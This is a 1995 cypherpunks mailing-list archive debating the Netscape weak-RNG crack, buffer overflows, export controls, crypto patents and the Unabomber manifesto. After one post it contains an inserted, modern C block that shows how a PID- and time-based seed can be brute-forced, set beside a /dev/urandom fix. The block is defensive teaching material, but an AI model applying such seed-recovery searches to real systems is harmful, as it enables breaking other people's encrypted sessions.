The Unabomber Manifesto as published in the September 19th 
Washington Post Special Supplement is available in a slightly
HTML-ized version at

http://yakko.cs.wmich.edu/~frogfarm/unabomb.html

I welcome all comments on both the form and the content of this page.

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 19:17:04 PDT
To: owner-cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509200216.AA17904@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I take a long term view of security. Basically I don't trust security software 
>until it has been released in a stable condition for a few years.

Really?  So I assume you won't be using an ATM card to buy gasoline until
the next millennium?

>Visa and Mastercard will be coming out with a spec which will have very tight 
>requirements for implementations.

I thought it was Visa and MC and Microsoft are coming out with an
implementation, and then will get around to releasing the specs.
One of V or MC also said that the only approved way to do Internet
commerce with their card was to use this new system.

	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Tue, 19 Sep 95 20:18:00 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: GAK
In-Reply-To: <199509150055.UAA18048@book.hks.net>
Message-ID: <Pine.SOL.3.91.950919221522.1807D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


As I said, phones are inherently tappable--going
upstream to the switch just makes it easier to do
and harder to detect.  This doesn't force the 
conclusion that, if people speak in code on the
phone, they have to give the gov't the key.

MacN

On Thu, 14 Sep 1995, Lucky Green wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <9509141935.AA09315@argosy.MasPar.COM>, koontz@MasPar.COM
> (David G. Koontz) wrote:
> 
> 
> >While not every telephone, every telephone switch is required
> >to be tap capable  - The Digital Telephony Act.  Note there is
> >provision for the government to pay costs for Telcos to make 
> >their phones tappable - as yet unfunded by Congress.
> 
> Most telephones can be used to monitor conversations in the room they are
> installed in even while on-hook. No need to ever enter the premises. Just
> drive it with AC.  Look at your basic telephone diagram and remember
> Xc=1/(omega*C) from your AC circuits class.
> 
> - -- 
> - -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBMFjO4yoZzwIn1bdtAQFmjwGAwMA+G0nO0m/lmYeqPJEsC5NJNLvS5cYk
> +cMaVSJb+Kwk6+uywu8v088Ih8Nz7uo9
> =elV9
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 19:23:09 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  SFChron
Message-ID: <9509200222.AA17923@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>"Mike Homer, vice president of marketing for Netscape, said that
>recent breaches do not mean the products are flawed"

Of course, it would have been better if the VP of Marketing said that
they had a bug, but that the fundamental architecture is sound.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 19 Sep 95 22:24:58 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: PGP back in legal limbo? [noise]
In-Reply-To: <9509200359.AA07322@toad.com>
Message-ID: <199509200524.WAA20365@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| >Since PKP (and Bidzos, now president of RSA) always said that DH
| >covered all public key encryption, it would seem that any RSA
| >licensee would also need a license from Cylink.
| 
| So, I suppose this invalidates the RSA agreement that allows PGP to 
| be distributed?  What "fortunate" timing for the pro GAK folks! Okay,
| everybody in US, erase your copies, before the Feral government comes 
| to get you.......

Conspiracy flag on.

Did anyone else but me see the discussion organized by Progress &
Freedom Foundation at SPAN, I believe yesterday night. John Barlow
from EFF was there, and he said a few things that certainly got
my attention.

He said that the "borders to cyberspace had to be protected", and
that the "fight for freedom in cyberspace was fought right now, not in
two years, but right now". And that we should "get encryption be
deployed out there, either in Europe [I think he said] or embedded as
a kind of holographic image in the Net". He also said that he
"expected 'blood' to be shed in this fight" (everything taken from 
memory, not exact quotes)

I was surprised at his intensity and outspokenness. I can't get this
kind of statements into agreement with the negative picture several
other cypherpunkers have painted of EFF.

I wonder whether the effort by EFF to put some sensible input into the 
official loop is failing, and that is behind his statements?
(I haven't seen/heard him make statements earlier, maybe this is his
usual way of expression?)

Does anyone but me smell an attempt of rewinding part of the
widespread use of PGP, because of a "patent problem".

I got the GAO report on "requirements for the information highway",
and they even included a PGP-encrypted email there. The report was 
rather positive to protect the privacy of the users, noting that it
was a fine balance between many interests - not the "law enforcement
only" point of view.

Conspiracy flag off.

/Christian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 22:18:12 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
Message-ID: <ac84f1b9250210046a05@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


My almost-namesake Sherry Mayo wrote:

>Found this quote from the Electronic Telegraph, the online version of
>a UK daily newspaper. (world news section, Weds 20th Sept)
>http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html
>
>"Editors forced to print manifesto of Unabomber
>
>By Charles Laurence in New York
>
>...The heart of his argument is that industrial society has led to ways of
>life for which people are fundamentally unsuited. He calls for a
>crypto-anarchic revolution and a new order based on small, village-style
>units."
>^^^^^^^^^^^^^^^
>
>Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-)

I've read a good chunk of FR's work at
http://www.ai.mit.edu/misc/unabomber and have to say he is making some very
interesting and incisive arguments, not all of which I disagree with.

But I also searched the text for mention of "crypto" and only came up with
the fairly standard usage of "crypto leftist." My assumption then is that
the meme of crypto anarchy has spread to the writer at that UK newspaper (I
wonder if Brian Arthur has been talking to them?) and that he interprets
FR's screed in terms of crypto anarchy?

Still, his writing style and some of his points seem close enough to some
of my own points, not to mention his Northern California nexus and
estimated age, that I'm expecting more inquiries (I deflected one already).

After the call from the Sheriff's office about my alleged activities, I
wonder....

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 19:38:11 PDT
To: owner-cypherpunks@toad.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509200237.AA17967@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> If it wasn't for ITAR the Net would already have secure encryption and
>> authentication, and most such hacker attacks would be impossible (or at 
>> least impractical).

>The non-responsive answer is stricken from the record.  :-)
>You mean "secure" as Netscape was secure from sameer et al.?

I don't think it's non-response, I just think you don't understand
your expert witness.

If not for the ITAR then I could distribute my secure applications
as a binary library with the security part as source.  When you
got Netscape you'd read the security code or ask local experts to
do so.  You'd verify that the code was correct (or at least not
stupid).  You'd then compile the security code and link it against the
main object module and away you'd go.  If you didn't have a C compiler,
you'd get a binary from someone you trusted.

Of course, all this would be going on in parallel at thousands of sites
around the world.  Everyone looking at the code, finding holes, reporting
them, fixing security bugs, and so on.

But ITAR won't let you do that.

Or netscape would just make calls to the common open multiple-crypto
API that existed in a shared library in your machine.

But apparently the ITAR won't even let you do this.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 19 Sep 95 21:49:26 PDT
To: "'SMTP:cypherpunks@toad.com>
Subject: Re: Verification of Random Number Generators
Message-ID: <305F9CEC@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 19 Sep 1995 09:04:29 -0700
"Erik E. Fair" wrote:
 --------
>>
>> Just an idle thought: it might be possible to do a probabilistic
>> verification of a RNG by sampling it over some number of samples, and
>> statistically analyzing the sample space. This would be analysis under the
>> model of "RNG as black box" as opposed to (or rather, if you're smart, in
>> addition to) code inspection & review. Any statisticians among us?
>>
>> Erik Fair
>>

The problem with a statistic is that it assumes an independent variable.  If 
the variable is not truly independent (which happens with some frequency in 
real world analysis), any purported statistical result is meaningless 
(undefined, to be more precise).  Clearly, the hack of netscape relied on 
the fact that the variable was not independent.

>But statistical tests of randomness alone do not make a good RNG.
>At least, not for cryptographic use. A cryptographically secure
>RNG is also unpredictable, i.e., computationally unfeasible to
>predict the next random bit will be given the algorithm, and not
>reliably reproduced, i.e., multiple runs with the exact same input
>do not generate the same sequence.

This is almost right.  Statistical tests work fine if they are conducted on 
independent variables.

dvw
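
The seed-bug critique earlier in this archive and the RNG-verification exchange above turn on the same point: a seed built from the process ID, parent process ID and time of day can be enumerated, and a black-box statistical test does not notice. The following is an added example, not code from any poster or from Netscape; the mixer, the toy generator, the search windows and the sample values are constructed, and process IDs below 32768 are an assumption. It runs a frequency (monobit) test on such a generator, recovers the seed by search, and shows a seed read from /dev/urandom beside it.

```c
/* Added illustration; every name and sample value here is constructed. */
#include <stdint.h>
#include <stdio.h>

/* splitmix64 finalizer: a statistically good but non-cryptographic mixer,
   standing in for whatever hash a real product might apply to its seed. */
static uint64_t mix64(uint64_t x) {
    x += 0x9E3779B97F4A7C15ULL;
    x = (x ^ (x >> 30)) * 0xBF58476D1CE4E5B9ULL;
    x = (x ^ (x >> 27)) * 0x94D049BB133111EBULL;
    return x ^ (x >> 31);
}

/* Weak seeding: process ID, parent process ID and time of day only. */
uint64_t weak_seed(uint32_t pid, uint32_t ppid, uint32_t sec, uint32_t usec) {
    uint64_t s = mix64(((uint64_t)pid << 32) | ppid);
    return mix64(s ^ (((uint64_t)sec << 32) | usec));
}

/* n-th 64-bit output of the toy generator for a given seed. */
uint64_t toy_output(uint64_t seed, uint64_t n) { return mix64(seed + n); }

/* Black-box frequency (monobit) test over `words` outputs.
   Returns 1 when |ones - zeros| stays within 4 standard deviations. */
int monobit_pass(uint64_t seed, uint64_t words) {
    int64_t ones = 0, nbits = (int64_t)words * 64;
    for (uint64_t i = 0; i < words; i++)
        for (uint64_t w = toy_output(seed, i); w; w &= w - 1) ones++;
    int64_t d = 2 * ones - nbits;        /* ones minus zeros */
    return d * d < 16 * nbits;           /* |d| / sqrt(nbits) < 4 */
}

/* Smallest b with 2^b >= candidates: the cost of exhaustive seed search. */
unsigned search_space_bits(uint64_t candidates) {
    unsigned b = 0;
    while (b < 63 && (1ULL << b) < candidates) b++;
    return b;
}

struct guess { uint32_t pid, ppid, usec; int found; };

/* Audit check: enumerate every (pid, ppid, usec) in the given windows for a
   known second and compare against two observed generator outputs. */
struct guess recover_seed(uint64_t out0, uint64_t out1, uint32_t sec,
                          uint32_t pid_lo, uint32_t pid_hi,
                          uint32_t ppid_lo, uint32_t ppid_hi) {
    struct guess g = {0, 0, 0, 0};
    for (uint32_t pid = pid_lo; pid <= pid_hi; pid++)
        for (uint32_t ppid = ppid_lo; ppid <= ppid_hi; ppid++)
            for (uint32_t usec = 0; usec < 1000000; usec++) {
                uint64_t s = weak_seed(pid, ppid, sec, usec);
                if (toy_output(s, 0) == out0 && toy_output(s, 1) == out1) {
                    g.pid = pid; g.ppid = ppid; g.usec = usec; g.found = 1;
                    return g;
                }
            }
    return g;
}

/* Hardened form: take the seed from the operating system's CSPRNG. */
int strong_seed(uint64_t *out) {
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t n = fread(out, sizeof *out, 1, f);
    fclose(f);
    return n == 1 ? 0 : -1;
}

int main(void) {
    /* Constructed sample values that an observer on the same host could bound. */
    uint32_t pid = 4242, ppid = 4200, sec = 811468800u, usec = 654321;
    uint64_t seed = weak_seed(pid, ppid, sec, usec);

    printf("monobit test passes: %d\n", monobit_pass(seed, 16384));
    printf("search space with nothing known but the second: %u bits\n",
           search_space_bits(32768ULL * 32768ULL * 1000000ULL));
    printf("search space with pid/ppid bounded: %u bits\n",
           search_space_bits(4ULL * 2ULL * 1000000ULL));

    struct guess g = recover_seed(toy_output(seed, 0), toy_output(seed, 1),
                                  sec, 4240, 4243, 4200, 4201);
    printf("recovered=%d pid=%u ppid=%u usec=%u\n",
           g.found, g.pid, g.ppid, g.usec);

    uint64_t good;
    if (strong_seed(&good) == 0)
        puts("replacement seed drawn from /dev/urandom");
    return 0;
}
```

The output stream passes the frequency test because the mixer is good; the seed is still found because its inputs span far fewer possibilities than the key it feeds.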




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 20:01:34 PDT
To: cypherpunks@toad.com
Subject: http://www.osf.org/~rsalz/unabomber
Message-ID: <9509200301.AA18027@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Snarfed from MIT.  I'm sure it will soon be all over on many
people's homepages.  I don't know if I want this terrorist to
appreciate the irony or be disgusted.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 20:03:39 PDT
To: cypherpunks@toad.com
Subject: Re: AOL monitoring
Message-ID: <9509200303.AA18042@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>How hard is it to record downloaded newsgroups/msgs from the news

INN, probably the most popular NNTP news system, by default logs
every time the client does a "group" command, typically sent
by the newsreader when you enter a newsgroup.  If you only fetch
articles by messageid then you'll probably avoid anything other than
connection logging.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Tue, 19 Sep 95 20:07:07 PDT
To: cypherpunks@toad.com
Subject: Not Crypto: Referencing Electronic Texts
Message-ID: <199509200306.XAA29101@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



This has nothing to do with crypto, but it's a question I'm sure a few
people on the list have had to deal with as well...

I'm doing a research project for a class on the problems of making
scholarly references to electronic documents, mainly on the how-tos
(for author writing document as well as one who cites an electronic
document in footnotes and bibliographies), as well as some technical
problems (sites change or go down, documents are modified by author
or hacker who doesn't indicate a modification, etc..).

Any information, URLs, references, personal anecdotes, methods, tips,
etc. would be greatly appreciated. (Please reply to me and not the
list unless you find some bizarre way of relating this to crypto...)


Thanks,

Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 23:02:05 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
Message-ID: <ac84fbf926021004d2c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 PM 9/19/95, Jim Ray wrote:

>In the relatively short time I've been on this list, Cypherpunks
>have bruted, and then found a weakness in, two kinds of Netscape
>software.
>[A fine public service, IMO. Congrats to all involved.]
>
>I don't expect to know NSA's specific brute-force capability, but
>does anyone know if the NSA has *ever* found a glaring weakness in
>software and then told its author(s) or owner(s) about it? Do "we"
>perform the "COMSEC" role Tim was speaking of better than the NSA?

Indeed, Jim is underscoring the point I was making, facetiously, that the
NSA has abandoned all pretense of helping to actually secure commercial
transactions (and no, I wasn't referring to Clipper...rather, I was
facetiously referring to the short-lived Commercial COMSEC Endorsement
Program, circa 1988-89).

As I said in my message, I don't _want_ the NSA or NIST (the same, really)
to be vetting commercial encryption. But I also don't want them claiming a
role in securing commercial encryption when they clearly are not even doing
as much as the Cypherpunks are doing.

By the way, if we count our own Matt Blaze's work on exposing weaknesses of
the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks
achievement," then the Cypherpunks have actually played a dominant role in
cracking these recent standards. (Not to mention the RC4 code postings, the
various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations,
etc.)

Well done, of course!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 19 Sep 95 20:26:45 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: NYT on Netscape Crack
In-Reply-To: <43lu3k$7q6@tera.mcom.com>
Message-ID: <199509200324.XAA03268@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> > I suspect that there are far more flaws in Netscape. String buffer
> > overflows are another good guess here -- they are probably rampant
> > through the code both for the browser and the commerce server they
> > sell. I can't prove it myself, of course, given that I don't have the
> > time to rip the thing apart, but the same folks never seemed to learn
> > their lesson in release after release when they worked at NCSA, and
> > the only thing that's probably keeping their dignity here is the lack
> > of distributed source code.
> 
>   Sigh.  For your information the security code for 1.x versions of
> netscape was not even written by someone from NCSA.

If there is ANY place in the code that I can do a data driven buffer
overflow, I can force you to execute code that I supply. I don't give
a damn if it's in the "security" code. It makes no difference where it
is. If there is a chink, that's it -- you're meat.

Besides, the "security code" obviously was written by someone who
doesn't understand anything about cryptography and yet presumed to
play cryptographer. A person who thinks seeding things off the time
makes for a good PRNG is capable of almost anything.

> In the places in the code that I have seen where it looked like such
> errors could have crept in, I have found that the correct checks
> for buffer overflow have been in place.

I have very serious doubts in this regard -- VERY serious doubts,
especially given what I've been told by several former Netscape
employees.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 19 Sep 95 23:33:17 PDT
To: cypherpunks@toad.com
Subject: Re: netscape broken on NPR
Message-ID: <199509200633.XAA18595@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:06 PM 9/19/95 -0500, you wrote:
>NPR reported on the security flaw in Netscape,
>
>3:05 pm CDT.	

As well as CNN Headline news.  (With the big Netscape N logo and
everything.)  They spent a fair amount of time (for CNN Headline news) on
the story.

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Sep 95 20:34:28 PDT
To: cypherpunks@toad.com
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <9509191929.AA15153@cs.umass.edu>
Message-ID: <43o23b$91r@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509191929.AA15153@cs.umass.edu>,
L. McCarthy <cypherpunks@toad.com> wrote:
>Confirming suspicions that PrivaSoft is a security-through-obscurity outfit:
>
>> From: David Clavadetscher <clav@deltanet.com>
>> Subject: Re: Encryption algorithms used in PrivaSoft
>> 
>> Dear L.,
>> 
>> At this time our crypto engine is patented and proprietary. If you tell me
>> the intent of your interest I will see what other information we can provide
>> to you. Call me if you like.
>[...]

Waitasec...  I was under the impression that if you patented it, you had to
reveal it.  That's why RC4 isn't patented (it used to be a trade secret).

   - Ian "IANAL yadda yadda"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Sep 95 21:09:15 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509200237.AA17967@sulphur.osf.org>
Message-ID: <Pine.D-G.3.91.950919233812.7785G-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Rich Salz wrote:

> >> If it wasn't for ITAR the Net would already have secure encryption and
> >> authentication, and most such hacker attacks would be impossible (or at 
> >> least impractical).
> 
> >The non-responsive answer is stricken from the record.  :-)
> >You mean "secure" as Netscape was secure from sameer et al.?
> 
> I don't think it's non-response, I just think you don't understand
> your expert witness.

Difficult to judge a non-responsive answer to a question, when you delete 
the question asked ...

The question was, essentially, what do you think should happen to a 
teenage hacker ...

The "answer" was ... if you did x hacking wouldn't happen.

I guess that means that the domestic version of Netscape can't be broken 
as sameer did.  Oh wait a minute.  Yes it can.  Sloppy work is sloppy 
work.  And it had nothing to do with imposed limits on key length.

Q.  What should you do to a person who robs a liquor store and shoots
the storekeeper?
A.  If you had gun control, he couldn't have shot him!

Replies in this vein remind me of nothing more than the people who, in 
response to reports of a tragedy in which children die of starvation, 
sickness, or whatever, write letters to the editor which say "thousands 
of children die every year because abortion is legal ..."


And given that the "unexportable" version of Netscape has the same gaping 
hole as the exportable version, your "it's all ITAR's fault" answer is, 
indeed, not responsive.

I even included a smiley for the humor-impaired, but that apparently was 
insufficient.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 19 Sep 95 20:56:36 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <v02130508ac84c085cc65@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 9/18/95, Steven Levy wrote:
>No chance. The problem for me isn't that someone wanted to call a movie
>Hackers but that it causes confusion in that for eleven years there has
>been a preexisting work by that name.  There is a novelization of the
>screenplay now in paperback, so if a friend recommends that you buy
>Hackers, you'll probably buy that one. (especially since Dell is
>determined to do as little as possible for my own book).

Normally when there can be confusion between a movie title and an existent
book title (in that the movie could be a dramatization of the book based on
general subject matter), the movie gets title clearance, pays a token
release fee to the book's author, and puts up a title clearance credit in
the movie credits. For an example of this, check out Bladerunner (based on
"Do Androids Dream of Electronic Sheep?" not "Bladerunner" [which was by a
different author]) credits where the prior uses of the title were
mentioned.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 21:05:58 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509200324.XAA03268@frankenstein.piermont.com>
Message-ID: <199509200403.AAA14189@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> >   Sigh.  For your information the security code for 1.x versions of
> > netscape was not even written by someone from NCSA.
> 
> If there is ANY place in the code that I can do a data driven buffer
> overflow, I can force you to execute code that I supply. I don't give
> a damn if it's in the "security" code. It makes no difference where it
> is. If there is a chink, that's it -- you're meat.

  How would you do this if the buffer overflow happened in a buffer
which was allocated in a separate protected heap apart from stack
and executable data?

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 19 Sep 95 21:06:32 PDT
To: cypherpunks@toad.com
Subject: Commercial RSAref
Message-ID: <199509200406.AAA01221@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	First off, let me congratulate you on inking this deal.  I hope that this 
will make a lot of interesting things possible, now that there is an RSAref 
toolkit outside the US, and also for commercial use in the US.

	I have a few questions, which I hope you can answer publicly.

	Will there be a public, standard fee schedule?  Many companies would like to 
be able to use RSA technology for a fee, and would like to know what that fee 
is without having to explain their plans in great detail to RSA.  I know 
people who would like to be able to say, here's a check, we're shipping
software using RSAref to 5000 desktops.

	Will you be adding access points to the software?  I know that PGP required 
new interfaces, previously unpublished, and that use of unpublished interfaces 
was also a problem RSA had with Wei Dai's excellent Crypto++ library. 

Adam

Jonathan Zamick wrote:

| Well I've vacillated between making a formal, dry announcement or
| letting you all know my way. Given the general tenor (and individual 
| spirit) of many on Toad it is pretty easy to guess which path I chose.

| So, first of all, here is to a productive future for encryption and 
| encryption technologies. Consensus Development and RSA Data Security, 
| have finalized the contract for Consensus to license and support 
| RSAREF(tm) for commercial use.


| Lastly, we would like to hear suggestions and ideas on how to improve 
| RSAREF. We intend to remain responsive to requests, and welcome ideas 
| for the evolution of the RSAREF toolkit.
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Sep 95 21:09:35 PDT
To: cypherpunks@toad.com
Subject: My Day
Message-ID: <43o44t$hof@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


Well, my brain's pretty frazzled about now (and I still have a pretty dense
paper on xFS to read and summarize for 9am tomorrow for my OS class) from
all the press that's gone after me today.
The ones I wrote down (I believe sameer wanted a list; I have names and
numbers for some of these, too, but it was pretty hectic: get off the phone,
go to my terminal, note that I have 20 new mail messages from people wanting
interviews or info, and answer the phone because it's ringing again.):

NY Times
WS Journal
SF Chronicle
CNN (camera crew)
Marketplace (NPR)
SF Examiner
Kansas City Star
Chronicle of Higher Education
Boston Globe
Newsweek (or WiReD; it was Steven Levy)

and at least half a dozen more.  Not to mention the job offers, one call
that I couldn't decipher (it sounded like one of those AI's that you see
roaming the net every so often, only on the phone), and email in French
(je suis canadien, but I was still amazed I could understand it).

Sorry for the blathering, but that's how I feel just now.

BTW: the line we tended to stress was "public availability of source to
at least the security bits", but who knows how it will come out?

Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif ) was kind enough to
verify that the SunOS 4.1.3 version of Netscape generates its keys in
_exactly_ the same way as Solaris and HP-UX; he says he'll test other
architectures tomorrow.  I suspect any big-endian machine with the
lrand48() function (which is used in key generation on Solaris/HP-UX;
it's disguised in unssl.c as the macro mklcpr()) will be the same.
Other Unix flavours should require only minor changes.

I'm still interested in what Windoze clients do (other than lose).

   - Ian "So how _did_ Netscape's stock do today?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 19 Sep 95 21:16:26 PDT
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: WWW: Unabomber Manifesto
In-Reply-To: <199509200210.WAA29968@yakko.cs.wmich.edu>
Message-ID: <199509200416.AAA18328@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> 
> The Unabomber Manifesto as published in the September 19th 
> Washington Post Special Supplement is available in a slightly
> HTML-ized version at
> 
> http://yakko.cs.wmich.edu/~frogfarm/unabomb.html


  The Unabomber's whole argument about "industrial-technological
society must continually remove freedoms" and his arguments
about the motives of scientists and technologists, are 
false by existence of modern cryptography and the cypherpunks.
The Unabomber's whole argument rests on his lack of imagination.
Almost all his arguments about large scale technology were
counterargued years ago on the Extropian's list. The errors
in his essay are numerous, for instance, he uses as argument,
that medical progress (if that were the only kind of technology)
would be bad in and of itself. As an example, he uses diabetes
which, if treated, allows the diseased to live longer and pass
on their genes. But most forms of diabetes happen at adult
onset long after the individual would have reproduced anyway.

His arguments against leftists, while partially correct, are poorly
constructed and flawed too. 

All and all, it wasn't worth the 3 deaths and 17 years of bombings
to get tripe like this published. The Unabomber should have found
a ghostwriter friend with a degree in philosophy and got him/her
to write and publish it.

Anyway, the best way to sum up the Unabomber's fantasy world is that
people in the past had high self-esteem, they were simple and happy, and
didn't have to climb the corporate ladder. 

Too bad he didn't read any anthropological studies first.

-Ray
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:09:43 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <ac85072c28021004746c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 AM 9/20/95, Jeff Weinstein wrote:

>  Of course none of this reduces the magnitude of the screw up/bug/design
>flaw/whatever.  I really can't say which of these it was since I wasn't
>around at the time that this code was being written.  I must admit that
>the RNG seed code was not an area that I thought to examine when I took
>over our security library.

In _retrospect_ (:-}), the approach taken by Goldberg and Wagner seems
pretty obvious. Where PGP, for example, asks the user to go through a
laborious process of "generating entropy" through ostensibly-random
keyboard button presses, Netscape does not do this. Nor does it, for
example, "listen" to a microphone input for some amount of time (to at
least make a plausible pretense of gathering entropy), nor does it measure
a Zener diode, or count clicks of a Geiger counter, or whatever.

The very speed of Netscape's PRNG process suggests the usual weakness in
PRNGs: simply not enough entropy. That is, a limited search space allows
the guessing of a seed or entry point in a deterministic process.


>  This was a bad mistake on our part, and we are working hard to fix it.
>We have been trying to identify sources of random bits on PCs, Macs, and
>all of the many unix platforms we support.  We are looking at stuff that
>is system dependent, user dependent, hardware dependent, random external
>sources such as the network and the user.  If anyone has specific
>suggestions I would love to hear them so that we can do a better job.

I think a reasonable way to generate several hundred seemingly random (or
at least highly unpredictable) bits is the "swirling the mouse" approach
mentioned by several people. All implementations of Netscape involve mice,
I assume, and this is a fairly fast way of generating hard-to-guess bits.
Colin Plumb has code to do this, as has been mentioned. (I'm not saying
that some number of "mouse swirlings" will generate some number of bits of
entropy...this depends on the platform, the granularity of mouse
measurements, etc. Better to take several times as many bits as needed and
distill them down, with MD5 or other hash functions....can't have too many
bits of entropy to start with!)

This could be done fairly quickly by Netscape, and doesn't assume the
